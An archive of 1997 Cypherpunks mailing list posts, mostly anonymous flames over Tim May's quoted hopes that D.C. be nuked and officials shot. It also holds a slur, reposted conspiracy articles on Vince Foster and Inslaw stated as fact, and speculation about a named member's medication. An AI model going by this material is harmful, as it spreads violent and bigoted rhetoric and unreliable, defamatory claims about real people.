: From: tcmay at got.net (Tim May)
: Subject: Snickering at the Compromisers
: Date: Mon, 12 May 1997 16:03:37 -0800
: : For the 3rd or 4th time, I have never advocated terrorism, at least not of
: a physical sort. I have said I hope to see D.C. nuked, which is hardly the
: same as "advocating" terrorism in any meaningful sense (not even the "will
: no one rid me of this corrupt city?" sense, given that I have no
: Beckett-like powers).
You admit here that you've said you hope to see D.C. nuked.
Do you really hope that D.C. gets nuked?  Do other list readers agree?
How many people would this kill?  Over half a million live in the city
proper, with millions more in the surrounding areas.  You have now said
that you would hope to see many of these millions of people killed.
It is this kind of support for depraved violence which has poisoned
discourse on this mailing list.  It is unconscionable to support such
an act of cold-blooded terrorism.
You're not even the worst.  Other posters have supported this kind of
sickening violence even more openly.  No one complains.  Apparently
everyone with an ounce of moral sense has left the list long ago.
You seem to think that the only problem with Waco is that the wrong
innocents were killed.  You have no problem taking out innocents
in Washington D.C. if it lets you get at your enemies.  You are no
different from the agents who killed the men, women and children in Waco.
You have no right to set yourself apart from them.  You are as ruthless
and violent as the worst of them.
This list reeks of death and violence.  Apparently there is no problem
which can't be solved by killing.  Kill the innocents of D.C.  Kill the
children in the day care center in Oklahoma City.  Drop more bombs on
Japan.  Cheer the cold-blooded murder of a government agent.  Kill the
children who scrawl graffiti on your mailbox.
Of course you have the right to post what you like.  But when you spew
garbage, I have the right to say it stinks.  It seems that other posters
have lost their sense of smell.  They say that's what happens when you
spend your time wallowing in sewage.

@_date: 1997-11-15 09:44:12
@_author: Anonymous 
@_subject: degree of anonymity 
Do other list readers agree? How many people would this kill?  It is this kind of support for depraved violence which has poisoned
discourse on this mailing list
This list reeks of death and violence.  Apparently there is no problem
which can't be solved by killing.  Kill the innocents of D.C.  Kill the
children in the day care center in Oklahoma City.  Drop more bombs on
Japan.  Cheer the cold-blooded murder of a government agent.  Kill the
children who scrawl graffiti on your mailbox.
You admit here that you've said you hope to see D.C. nuked.
Nothing more than a forged spoof by TruthMangler.
You have no right to set yourself apart from them.  You are as ruthless
and violent as the worst of them.
Now maybe everyone will see what I mean when I say that those on this
list now only stand for guns, violence, threats of terrorism and murder,
racism, homophobia.
Anne Ahole

@_date: 1997-11-15 10:00:47
@_author: Anonymous 
@_subject: This judge needs killing 
Another example of the violent rhetoric which goes without comment on
this list.
The death penalty is completely inappropriate for this kind of crime.
It should be reserved for the most serious of criminal actions, the most
egregious murders, terrorism, genocide.
An appropriate punishment for a judge who violates his oath of office
and sentences someone wrongly to prison would be a prison sentence for
the judge himself, some multiple of the unjust sentence.
Calling for the death penalty for crimes which do not themselves involve
killing only cheapens life.  Before long you too will support shooting
graffiti vandals and nuking London.

@_date: 1997-11-15 13:10:54
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
This is not true.  Tim May is not stupid.  He is insensitive and bigoted,
violent and dangerous.
He is certainly a racist, and believes in the superiority of the white race.
But he is not stupid.

@_date: 1997-11-15 13:10:56
@_author: Anonymous 
@_subject: What cypherpunks used to be 
Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.
The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.
Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.
Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.
Cypherpunks don't care if you don't like the software they write.
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down. This is why cypherpunks
itself is a distributed mailing list.
Cypherpunks will make the networks safe for privacy.

@_date: 1997-11-15 15:51:47
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
More of Tim "chop chop" May's racism.  This is the man that you claim to
have respect for.  You must be turning your head away in embarrassment
from this offensive behavior.  But he's not embarrassed about it, so why
should you be?  Look plainly at the kind of man you are dealing with,
and ask whether he deserves your respect.

@_date: 1997-11-15 18:53:25
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
Not much ambiguity here, is there?  No waffling about what a capital
crime is.  This is a clear statement that Florida governor Chiles as well
as various federal officials should be shot.  More deaths, more killings,
more murders.  That is what Tim May stands for.
This speaks for itself.  Only an utterly depraved, sick, and vicious
individual could support the killings in Oklahoma City.  This is the man
who many would say is the most respected on the list.

@_date: 1997-11-15 19:12:41
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
Tim May-San says:
Tim: Fatmans doesn`t have any clients.  He`s just a wannabe consultant.  He`s actually an undergrad at some limey univesity, and has too much
time on his hands.
Yeah likely.
Oooo another subtle suggestion that the Journeyman is the anonymous

@_date: 1997-11-15 19:31:10
@_author: Anonymous 
@_subject: The joke's on Joichi (hee, hee) 
Heh, heh. Joichi's English is so good that I have been improving
my own grammar and spelling in my posts in order to make fun of him through imitating him.
? the Racist Platypus

@_date: 1997-11-16 04:16:25
@_author: Anonymous 
@_subject: auto signing messages Re: perl from Amad3us 
Antonomasia says:
Sure.  But have you looked at pgp2 source code? (smirks).
(Hint, temporary files all over the place.)

@_date: 1997-11-16 08:34:26
@_author: Anonymous 
@_subject: auto signing messages Re: perl from Amad3us 
For you old farts who have not been out in the real world for a
while, you should make note of the fact that the price of memory
has dropped, and it is now feasible to implement RAM disks to
store temporary files.
  You can also direct a program to use a RAM trash-disk for its
temporary files, wiping it immediately after use without having
to worry about fucking up your other temporary files.

@_date: 1997-11-17 03:30:03
@_author: Anonymous 
@_subject: The Policeman Inside 
Tim May says:
Sounds like a good plan to me!
What do people think this nym is for?  Only nyms can trade with
impunity in the tax free cypherspace.

@_date: 1997-11-17 03:34:26
@_author: Anonymous 
@_subject: Nakatuji-san and Male PenPals 
I look up all of the URLs in the InfoWar Chronicles sent
to the list and I was mystified as to why the one you
just mentioned (
was linked to when I clicked on the word _extortion_.
Now it makes sense. Kinda. Maybe.
If you click on the highlighted text _terrorists steeped in extremism and political hatred_ it sends you to whithouse.gov.
When I get one of those chapters when I am too fucked up to
read I just read the highlighted text and see where it goes
and its usually pretty weird.
I wonder if Nobuki charges his _pen pals_ the same price as
he charges cypherpunks. ;P ($50 to have him _play Misty_
for us). ;P

@_date: 1997-11-17 04:05:48
@_author: Anonymous 
@_subject: the art of fighting without fighting 
Bruce Lee film.
Scene on a sailing ship headed for island where tournament
is to be held.
Thug karate type hassles Mr Lee, picking a fight.  Thug
asks: "so what kind of karate do you fight."  Mr Lee: "the
art of fighting without fighting."  Thug asks for fight.  Mr
Lee: "not here, on that island over there," points.  OK says
thug eagerly and climbs down into rowing boat.  Mr Lee
unties end of rope and hands to children playing, leaning
over edge of ship.  Thug screams obscenities from row boat,
trys to pull himself in but children threaten to let go of
Mr Lee walks off camera unperturbed with smug look.
Moral of story: fight smart.  That's what cypherpunks tactic
is.  Multiplies your efficacy.
Anonymous decries talk of violence on list.  Understand
anonymous, we are not the aggressors, we are the aggressed.
It is annoying being on the receiving end of aggression
especially where the aggressor is the local force monopoly
and you have no recourse.  Hence talk of nuking DC, and of
capital punishment for criminal government officials.  There
is certain poetic karmic value to these expressions of
annoyance.  Helps spread the dissatisfaction with
However, the fact that criminal officials deserve punishment
does not mean that any of us are interested to actually
deliver that punishment.  There are more efficient methods
of utilising our available resources: write crypto code,
hasten crypto-anarchy.  Have the government collapse through
lack of funding, have it's power eroded.
Let's get to it.

@_date: 1997-11-17 07:59:56
@_author: Anonymous 
@_subject: No Subject 
The DEA announced friday that doctors in Oregon that participate in doctor assisted suicides will have their licence to prescribe drugs revoked. Since when did the DEA gestapo obtain the power to regulate physician's rights to prescribe the drugs their patients need? But more important is the realization that the thugs in DC now consider our votes null and void, the _people_ of Oregon voted to allow assisted suicide, TWICE, I thought this was a government _of_ the people? In Arizona, the people voted to allow doctor prescribed marijuana for those that the doctors thought it would help relieve their pain, the governor of that state the morning after the vote declared the people of Arizona were stupid and he would block implementation of the law, what the fuck are these hicks voting for don't they read the pabulum we spoon feed them day after day about the dangers of drugs?
The Kent Crispins of the world wake up, voting is a waste of time, the bastards only allow us to vote for Moe, Curly, or Larry, all of the same union of thugs, some assigned to the Republican party, some assigned to the Democratic party, soon even that fig leaf of democracy will be discarded and the maximum leader will tell us it is necessary for national security reasons to suspend voting on our leaders.
Lock and Load? No I dont think so, it is pointless, go out get drunk, screw anybody that will consent, have a good time, the chains will soon clamp on your neck.
Amerika love it or leave it.

@_date: 1997-11-17 10:46:18
@_author: Anonymous 
@_subject: Digital Revolution! 
I am proud to announce the formation of the DIGITAL MAJORITY TAX FREE
FOUNDATION for the purpose of serving as the voice of people with ten
fingers, across the face of the earth.
As a one-person operation, the DIGITAL MAJORITY TAX FREE FOUNDATION
will be able to voice opinions representative of all ten-fingered people for a fraction of the cost of the bloated bureacracies which
bleed charitable people around the world dry through a multitude of
sham organizations catering to narrowly focused self-interest groups
which have spread like a plague throughout the DEXADIGITAL community.
As the sole member of the Digitally United Membership Board, I will
be in a position to speak for practically everyone, everywhere, on
all issues, and getting stinking rich while still bleeding the mass
of humanity of their hard-earned money at a mere fraction of the
cost of the current unweildy network of tax deductible rights and
freedoms organizations.
  The DIGITAL MAJORITY believes in equal charitablization for those
with equal digitization, as well as many other vague concepts under
which all DexaDigital people can stand under the flag of freedom on
the distant shores where bells ring for liberty and all mankind.
To save the life of a single child, send your contributions to:
   DIGITAL MAJORITY, BOX 281, BIENFAIT, SK. CANADA S0C 0M0
This message sponsored by:
        Modern Motels of Bienfait Conglomeration
     "Modern, in the traditional sense of the word."

@_date: 1997-11-17 17:21:18
@_author: Anonymous 
@_subject: (Fwd) Victory For Microbroad 
as having written:
Oh dear! If interstate commerce is indeed the constitutional excuse, er, basis for the FCC (and I don't know that it is),
then current doctrine would probably recognize the following
as providing FCC jurisdiction over micropower stations:
  *  Transmitter/components acquired in Interstate Commerce
  *  Electricity used was generated in part in another state
  *  Station owner deemed to have moved interstate to set up
  *  Air breathed by staff moved across state lines
  *  "Ether" inseparably integral with ether of other states
Once they assert that stuff, bashing a fellow radio station
employee with a burned-out klystron will be a federal crime.
Come to think of it, this might be a good time for anyone in
danger of being in a bar fight to make sure they are wearing
clothes manufactured entirely in the same state and to drink
only locally produced adult beverages.
The way things have been going the entire law enforcment and
criminal justice system could be co-opted by the feds, making
local police just deputized body-collectors for the federal
meat grinder.  Freeh's wet dream, I suppose.

@_date: 1997-11-18 11:15:07
@_author: Anonymous 
@_subject: RTFM-709 
I have attached a file which includes some of the responses
sent to "Information Server ", as well
as a post to the list, apparently from David E. Smith, the
remailer operator at Bureau42, giving the 'correct' address
of the non-existent 'Information Server' supposedly at
Sympatico...and, as a special bonus, a post to the list,
purportedly from you, thanking 'Dave' for the information.
  You are a victim of your own misplaced faith in the great god known as WYSIWYG. (What you see, is what you get. -- NOT!)
  If I _am_ , then you have the satisfaction
of knowing that if I suffer a serious regression into my former
violent, psychotic delusional state, that the proper authorities
will likely be able to track me down and prosecute me for you
bizarre, sadistic murder.
  If I am _not_ , well...
  Regardless, whether you are seeking information on email interception
or home-study on how to committ bizarre sex acts with farm animals,
your interest in this information is known to both whomever you send
your request to, as well as everyone who you reply to in regard to
offered information, as well as everyone that the recipients share
your email with _and_ anyone who manages to access the email accounts
or systems of _all_ of the forementioned.
  Since both your real and forged corresponedence has already gone
to private email accounts, public mailing lists, and perhaps to
USENET and beyond, I think you can see the advisability of using
encryption to limit access to the plaintext of your message to
only those you specifically encrypt the message to.
  You may not care if the whole world knows that you want information
on email interception, or even about your fondness for farm animals,
but there are undoubtedly things which you would rather keep between
yourself and the intended recipient.
  If a real 'Information Server' had a verifiable Public Key for
you to encrypt your reply to, then it would not likely matter if you
sent the message to a spoof address, as unknown recipients could
not likely read it. The same applies to your friends, relatives and
bussiness acquaintances. If you use encryption for those things
which are important for you to keep private, then you do not have
to worry as much if they share an email account, computer or system
with friends, family, coworkers or strangers.
  The 'spoof' I did was neither technically complicated nor even
particularly clever. On the other hand, there are a plethora of
people in existence who are both clever _and_ skilled at poking
their noses in wherever they want and doing whatever they like
with the information.
Louis J. Freeh  (aka TruthMonger)
Director  (aka Lunatic)
Federal Bureau of Investigation  (aka Electronic Forgery Foundation)
"The Xenix Chainsaw Massacre"
"WebWorld & the Mythical Circle of Eunuchs"
"The Final Frontier"
Received: from borg.mindspring.com (borg.mindspring.com
        by orion.sk.sympatico.ca (8.8.6/8.8.6) with ESMTP id TAA11966
        for ; Sat, 15 Nov 1997 19:34:39 -0600
Received: from ip164.hartford.ct.pub-ip.psi.net
(ip164.hartford.ct.pub-ip.psi.net [38.10.219.164])
        by borg.mindspring.com (8.8.5/8.8.5) with SMTP id UAA21805
        for ; Sat, 15 Nov 1997 20:34:14 -0500
Comments: Authenticated sender is

@_date: 1997-11-18 11:39:28
@_author: Anonymous 
@_subject: [cpe:4545] Mission:Critical and Informal Fallacies 
Careful, TM, you're starting to sound like a member of the Usenet Kook Cabal.
I was stuck on 'vituperative.' Shows what I know. But 'attack the messenger,
not the message' is old news here.
Kiss my ass. :-)

@_date: 1997-11-18 15:24:23
@_author: Anonymous 
@_subject: Tentsicles 
IS FOSTER KEY TO "THE OCTOPUS?"
                          Editorial
    When you start digging into the circumstances surrounding the
death  of  White  House aide Vince Foster, a number of names keep
popping up that have popped up in relation to a number  of  large
scandals of the last two decades.
    Starting with the "October Surprise,"  the  alleged  plot  to
delay the release of hostages from Iran to after the presidential
election in 1980 in an attempt to embarrass President Carter,  it
is  indeed  striking  that  the hostages were released just a few
hours after President Reagan was sworn in.  A number of witnesses
have testified to the involvement of Vice President Bush and Earl
Brian in this secret plot. These witnesses,  all  CIA  or  Mossad
assets,  have  received the "Terry Reed treatment": indictment on
false charges and  thorough  discrediting.  But  it  was  another
source, White House staffer Barbara Honegger, who wrote the first
"October Surprise" book in 1989.
    It was early in the Reagan administration  that  Earl  Brian,
Richard Secord and others used their influence and connections to
make money on selling the pirated  PROMIS  software  from  Inslaw
Inc.  Former  OSS  agent Jackson Stephens is alleged to have made
money on PROMIS as well through his Arkansas Systematics Inc.  It
was  there  that Vince Foster, as a partner of Hillary Clinton in
the Rose Law Firm and representing Systematics,  became  involved
with the Inslaw affair.
    A much  bigger  scandal  of  government  corruption  was  the
Savings  and  Loan  scandal  of  the  1980.  The federally backed
savings-and-loans were not only looted by  crooks  and  criminals
but  also  by well-connected politicians who needed an easy buck.
Neil Bush and Bill and Hillary Clinton are just a few examples.
    Apparently not content with the hundreds of billions in S & L
loot  from  the  taxpayer, corrupt government officials turned to
drugs. The CIA-sponsored Contra re-supply  network  was  used  to
ship  illegal  drugs of incredible volume into the United States.
CIA assets Terry Reed and  L.D.  Brown  implicate  Bill  Clinton,
George  Bush and Oliver North with this operation. A confidential
CIA document obtained  by  the  Washington  Weekly  supports  the
involvement  of  George  Bush by linking him to arms-dealer Adnan
Khashoggi, Richard Secord, and CIA asset John Hull,  whose  ranch
in  Costa  Rica  was  used  for  transshipment  of drugs and arms
through Mena, Arkansas and other U.S. destinations.
    Another of these scandals during the 1980s  was  the  illegal
penetration of the bank that the CIA preferred - the BCCI Bank of
Crooks  and  Criminals.  Politicians  across  the  spectrum   are
implicated  in  taking  bribes  to  allow  this bank to take over
American banks with  the  help  of  Jackson  Stephens  and  Vince
Foster.  No serious investigations have been launched by the Bush
and Clinton Justice Departments.
    Leaving aside for a moment the dispute over  whether  any  of
these  scandals  have  been proven, there is one remarkable facet
about the facts as they have been presented: some names appear in
several of these alleged scandals.
    Topping the list is George Bush, the  only  CIA  director  to
become  President  of  the  United  States.  It  is  difficult to
reconcile these serious allegations with the rather decent public
image   of   George  and  Barbara  Bush.  But  to  dismiss  these
allegations out of hand is to accept a conspiracy that includes a
large  number  of unrelated witnesses naming the same culprits in
different scandals.
    But it  should  also  be  said  that  participants  in  these
scandals  may  have thought they acted to defeat Communism, where
the end would justify every means. After all, that was the  prime
objective of the CIA during the Cold War.
    Are these  the  arms  of  the  octopus  that  reporter  Danny
Casolaro  referred  to just before he was found dead in his hotel
room in 1991? He  told  friends  he  was  tracing  a  network  of
government  corruption  involving  Inslaw,  BCCI, and the October
Surprise. Washington D.C. attorney Paul Wilcher was  tracing  the
same Octopus when he was found dead three days after Vince Foster
    Think back to the 1992 elections for  a  moment.  Did  George
Bush  bring  up  any  of  the  scandals  that could have defeated
Clinton?  Did he mention  Whitewater,  Cattlegate,  Paula  Jones,
Gennifer  Flowers,  Mena?   Why  not?  Did  he know that it could
backfire seriously because of what Bill Clinton knew  about  him?
Did  Bill  Clinton take advantage of that in his unlikely bid for
the presidency?
    What, then, is this Octopus? It appears to be an  association
between  rogue elements of the CIA and certain elected officials.
An analysis of these structures  will  show  that  corruption  is
inevitable.  The CIA has a budget of $28 billion, it assassinates
people without being held accountable  in  a  court  of  law,  it
operates  in  secret,  it  has  almost unlimited power and is not
subject to any meaningful  oversight.  Only  saints  could  avoid
corruption and abuse of power in such an environment.
    Then what can we do about it? Limit the budget  of  the  CIA,
limit  its  role,  subject it to greater outside scrutiny, expose
past scandals and hold individuals responsible for their  crimes.
Three  presidents tried to do just that: John F. Kennedy, Richard
Nixon, and Jimmy Carter. None of them stayed in office for  long,
and none of them achieved their goal.
Copyright (c) 1995 The Washington Weekly (

@_date: 1997-11-18 16:08:59
@_author: Anonymous 
@_subject: I'm from the government, and I'm here to fuck you silly... 
INSLAW SUMMARY
                         By Bill Hamilton
The following information has been given to each member of the House
Judicary Committee and was placed on the Internet in electronic form
by Bill Hamilton of Inslaw Corporation.  The complete document with
supporting details may be obtained from:
    Inslaw
    1125 15th Street, NW
    Washington, DC 20005-2707
    Telephone (202) 828-8638
     One of the organizational units that reports to Mark Richard is
the Office of Special Investigations (OSI).  OSI's publicly-declared
mission is to locate and deport Nazi war criminals. The Nazi war
criminal program is, however, a front for the Justice Department's
own covert intelligence service, according to disclosures recently
made to INSLAW by several senior Justice Department career officials.
     One undeclared mission of this covert intelligence service has
been the illegal dissemination of the proprietary version of PROMIS,
according to information from reliable sources with ties to the U.S.
intelligence community.  INSLAW has, moreover, obtained a copy of a
27-page Justice Department computer printout, labelled "Criminal
Division Vendor List." That list is actually a list of the commercial
organizations and individuals who serve as "cutouts" for this secret
Justice Department intelligence agency, according to intelligence
community informants and a preliminary analysis of the computerized
list.  A significant proportion of the 100-plus companies on the list
appear to be in the computer industry.  The Justice Department's
secret intelligence agency also has its own "proprietary" company
that employs scores of agents of diverse nationalities, as well as
individuals who appear to be regular employees of various departments
and agencies of the U.S. Government or members of the U.S. Armed
Forces, according to several sources.

@_date: 1997-11-18 16:16:27
@_author: Anonymous 
@_subject: Exporting crypto from Japan 
Yeah, surprising, isn't it, considering how open and welcoming the
cypherpunks have been to foreigners and minority races...
Actually Adam Back should be nominated for cypherpunk of the year.
Unlike a blowhard do-nothing like Timothy "Chop-chop" May (and now we know
what the C stands for, don't we?), Adam actually accomplishes things.
His 3-line RSA has dramatized the absurdity of the export controls like
nothing else.  He built a working prototype of an eternity server while
everybody else just talked about it.  He's been a leader in the fight to
oppose PGP GAKware.  He has strong political views but is not motivated
by hatred and fear.
Adam doesn't get nearly the respect he deserves, probably because he's
not much of a wordsmith.  Tim May's sophistry is good enough to pull
the wool over most people's eyes.  But look deeper and you'll see that
Adam's heart is pure.  That's worth far more than May's skill at artfully
wrapping his garbage.

@_date: 1997-11-18 16:16:27
@_author: Anonymous 
@_subject: [cpe:4577] Re: List Robustness 
Now that you've told us, are you going to have to kill us?

@_date: 1997-11-18 19:23:56
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
Anybody remember when people still used the term "ObCrypto" in their
posts?  That was back when the list still meant something about crypto
and freedom, before it became dedicated to racial hatred.  I understand
that the catchphrase de rigeur is now "ObJapBashing".

@_date: 1997-11-18 19:57:53
@_author: Anonymous 
@_subject: Tim May's offensive racism (was: about RC4) 
So you are proud of your statement about Japan?  You believe that
President Truman should have dropped additional atomic bombs (if he had
them) on Japan, even _after_ they surrendered?  This would have been in
contravention of every shred of decency and honor.  Such a bloodthirsty
act of revenge would have branded the U.S. as hopelessly barbaric, savage
and inhuman.
Your comments do fit in well with the current tenor of the cypherpunks
list, though.  Barbaric, savage, indecent, dishonorable.  These are the
new codewords of the cypherpunks movement.  The uglier it gets, the more
they like it here.  You do indeed fit right in.

@_date: 1997-11-18 21:27:38
@_author: Anonymous 
@_subject: Overcoming prejudice 
Former Klan hotbed elects first black mayor
November 16, 1997
STONE MOUNTAIN, Georgia (AP) -- By the light of a blazing cross, the Ku
Klux Klan proclaimed its 20th century rebirth on the granite mountain
that gives the town its name. For decades, white-hooded Klansmen flocked
here for annual gatherings, and Confederate heroes are sculpted into
the side of the mountain.
Today, the mayor's office once held by an imperial wizard of the Klan
is about to be filled by a black man, who also lives in the former KKK
leader's house.
Elected with biracial support, Chuck Burris is more concerned about
getting new sidewalks and more police than with Stone Mountain's old
image of racial division.
Burris, a city councilman, defeated a six-year incumbent in the November
4 election and will lead a black majority City Council in January.
Campaign didn't focus on race
'We wanted the best-qualified candidate'
New mayor lives in house that belonged to Klan wizard
If the birthplace of the KKK can rise above its racial prejudice, is it
too much to ask the same of ourselves?

@_date: 1997-11-18 23:35:21
@_author: Anonymous 
@_subject: How anonymous? 
"You know Mixmaster?  Send me 50 dollar, I show you how use."
But seriously, there is something to be said for adopting a style of writing specific to a nym or group of nyms.  Anyone who has read The Economist magazine on various occasions knows how its language and tone are consistent, as if one author writes every article, issue after issue.  Having the writings of a nym "edited" by others as a way of foiling Stylometry -- the statistical analysis of literary style -- may prove to be a lucrative business if nyms ever gain wide use, especially if they are used in ecommerce where anonymity of the nym holder is paramount to avoid the wrath of the tax man in his physical jurisdiction.
Much of our writing style is unconscious.  We habitually use certain vocabulary, sentence structure, punctuation.  Our writings are like a fingerprint.  The more we write, the greater the detail of that fingerprint.  We can try to alter the style.  Write shorter or longer sentences.  Choose our words capriciously.
But on some occasions (think ecommerce) it may be necessary to have a second party rewrite the original text.  Enter the "nym editor" to remove the stylometric clues from a nym's writings.  Correspondence between the nym owner and editor could be achieved anonymously using remailers, nym servers and "throw away" email accounts (Hotmail and Mailexcite).  When the nym owner locates an editor and they agree on the terms of engagement, the owner submits his text to the editor.  The editor reworks it, and sends it back to the owner.  The owner may then make a few small changes or even submit it to another nym editor before posting the text under his nym.  A nym owner may prefer a certain editor's style and continue to use him.  Thus the nym will offer stylometric clues of the editor, not the owner.
The nym owner can pay the editor using ecash, preferably of the fully-anonymous flavor.  If the nym owner stiffs the editor on a payment, he can then broadcast it through the relevant channels.  The nym suffers loss of reputation capital.  It seems reasonable to assume that the likelihood of fraud by the nym holder is slim, especially if the editor tends to deal with persistent nyms.
Fraud by the nym editor is also unlikely.  The worst he could do is publish the unedited text, giving stylometric clues about the nym holder.  The prudent nym holder who uses more than one editor can better avoid such a situation, though that risk is never entirely eliminated.  However if the nym editor is uncertain of the author of the text he is reworking, there is little incentive to blackmail the nym holder since all he may be doing is passing on stylometric clues about another nym editor.
Amad3us wrote elsewhere:
But only as long as the nym holder remains anonymous.  Digital mixes are superb, but what good are they when we give away clues about who we are with every keystroke we embed in our digitally-signed messages?

@_date: 1997-11-19 02:30:14
@_author: Anonymous 
@_subject: Overcoming War with Information 
Good point, but it's important to realize that these new attitudes are
only available to people who have access to the tools.  Much of the world
is still trapped in a dark age, without access to the light brought by
tools for communication.  Powerful interests seek to keep them that way.
Until that changes, the old mindset of us-against-them will continue to
be a threat to peace.
We as cypherpunks must be leaders in encouraging wider access to
communications and the tools which manage information.  It's not
right to target our message narrowly to the militias and racists
who gravitate towards anti-government causes.  We must be inclusive,
offering encouragement to other cultures, other races, other countries.
Anti-Japanese, anti-Jewish, anti-Black, anti-Arab sentiments will only
hinder our success, and likewise with our emphasis on violence, killing,
and death as solutions to problems.
The fact that other cultures are often repressive in their own right is
no excuse.  The tools we offer will help them become more open-minded
and inclusive.  But we must set an example ourselves.  It is a tragedy
that the message of hate is being propagated within a technological
movement which should foster openness and enlightenment.  We can do
better than this.

@_date: 1997-11-19 11:09:41
@_author: Anonymous 
@_subject: Report on UN conference on Internet and racism 
But that applied to non-citizens on US soil. IIRC, it removed the distinction between "good aliens" (i.e., those who had green cards) and
"bad aliens" where availability of services was concerned.
I don't think non-citizens who aren't on US soil have any particular
protection under US law. They can bring a lawsuit against the US or a US
entity, but I think that's about it (cf. Jim Choate's posting of the
relevant Constitutional sections).

@_date: 1997-11-19 13:18:18
@_author: Anonymous 
@_subject: Is Tim May a 'felon' under these laws? / Re: Banned smells 
This would explain the cancellation of all flights between DC and
  Why didn't Tim May perform a 'citizen's arrest' in Stanford? Failure
of nerve, or offsetting penalties? (Punt, Tim, punt!)

@_date: 1997-11-19 18:40:25
@_author: Anonymous 
@_subject: Disposable Remailers 
I played around with Hotmail recently, and I didn't pick up any new cookies in my cookies file.  The only distinguishing information that Hotmail seems to collect (aside from the demographic info you feed them when you open an account) is the IP address you log in from.  A public proxy is sufficient to shield your IP address.  I created the account from one IP address and sent the email during a separate session from another IP address.  The X-Originating-IP header showed only the second address.  I don't know if Hotmail keeps track of all IP addresses that access each account.
Question: can anyone suggest some information/studies regarding the security of public proxies?

@_date: 1997-11-19 20:56:03
@_author: Anonymous 
@_subject: Bob Hettinga's attention surplus disorder 
Several people have commented about Bob Hettinga's verbosity,
Thompsonesque writing style, and apparent limitless supply of bubbly
Sometime ago during a discussion of ADD (Attention Deficit Disorder)
Bob told his story on the list.  He explained that he had had ADD, but
was now on amphetamines to counteract this, and was feeling much
better.  It was quite brave of him to discuss this openly.
I suspect what we are seeing is that the amphetamines are more than
counteracting his putative ADD problems, to the extent that he has
more energy than normal to write long winded Thompsonesque rants, the
content of which could be more clearly expressed in a treatise 1/10th
the size.
Impatience is a useful trait, because it causes one to reconsider the
efficiency of approaches.  Most of us simply don't have the patience
to even read the voluminous posts of Bob's to locate the actual
content amidst the colorful metaphors (rocket launchers, snot covered
gun barrels, etc).
No offense to Bob, but I think his effectiveness would improve if he
let off the amphetamines a touch.

@_date: 1997-11-19 22:07:09
@_author: Anonymous 
@_subject: Nobuki Nakatuji 
Nobuki Nakatuji, though lesser known, is like Monty Cantsin and Luther Blissett, well-burnished pseudonyms used by wads of artistes who believe them to be more artful than hoary Anonymous. Globalists are producing variations of nom-de-plumes to scribe a message to the clued - duh, in Imperialist Yanklish.
Reputation capital and persistent identity convince only the
duh-speakers who believe insider secrets, insider lies of hot IPOs, and MISTY/RSA chips ostensibly made in JP and NDA-ed to the gullible by pseudo-chipper fab-lab MD-stingmasters.

@_date: 1997-11-20 04:56:50
@_author: Anonymous 
@_subject: Report on UN conference on Internet and racism 
Actually, many studies have found that immigrants, legal and illegal,
make a net positive contribution to the economy, even considering their
access to government services.  Anyone who has worked with these people
knows that most of them work harder than native born Americans.
Even aside from the strictly economic balance sheets, giving these
people the opportunity to succeed in a free country is a significant
moral benefit which must count in favor of free immigration.
They also serve to make our country more multi-cultural, with
greater awareness and appreciation of the value of alternate customs
and lifestyles.  We develop "hybrid vigor", as our culture is cross
fertilized by elements from all around the world.  The result is an
incredibly dynamic and flexible culture, which is why the United States
will continue to be a world leader for the next century.
Of course, this gift of diversity causes immigrants to be hated and feared
by racists such as Tim May, who sees them only as targets to mock with
threats of murder:

@_date: 1997-11-20 08:11:55
@_author: Anonymous 
@_subject: Report on UN conference on Internet and racism 
Presumably by "this list" you are referring to the fight-censorship list,
and not the cypherpunks list (your message was distributed to both).
The cypherpunks list has been well established as an outpost of hate
and bigotry for some time.
About a year ago, influential cypherpunk Tim May turned away from the
previous emphasis on cryptography and privacy, towards a new approach
emphasizing guns, violence, killing, exclusionary rhetoric, and crude
racist humor.  New members have become active who apparently find these
topics more accessible than the arcane cryptographic technicalities
discussed in the past.  You no longer need a good mind to read the
cypherpunks list; today, a strong stomach is more important.

@_date: 1997-11-20 13:07:38
@_author: Anonymous 
@_subject: Fairy Gold 
If this were really true, you would have posted your message under your real name (a.k.a., your persistent identity).  The fact that you chose to make your statement anonymously only proves the inverse of what you say.
We should remember that -- at least here in America and the rest of the so-called first world -- we live in the age of the sound bite where the "medium is the message."  Public opinion is manipulated by the puppetmasters who pull the emotional strings of John and Jane Q. Public sitting in front of the TV each night.  Witness how anyone who has watched a video on Waco is quickly being lumped into the category of an anti-government extremist (Terry Nichols had two copies of "Waco Under Siege" in his house).  The underlying message is, "don't consider any of the facts that the video viewer presents to you, just realize he/she is an extremist."
Frankly, I wasn't there at Waco so I don't know what happened.  However, as Monty pointed out in another post, the fact that the FBI/BATF/etc. administered the gas into the Davidian home (notice how I fail to use the media-sanctioned term "compound") is clearly an aggressive act on the part of the U.S. gov't.  Regardless of what the spinmeisters say (both on the left and the right) no human being with a conscience can take note of this fact and say that the feds were justified in their actions.  Gassing children?  Come on.
A single sound bite on its own will do nothing, but a persistent group of sound bites presented over time with a recurring message can create a great amount of influence.  This is how public opinion is formed through mass
media channels.
But think about this: who is the author of these mass media sound bites?  Can you name the person?
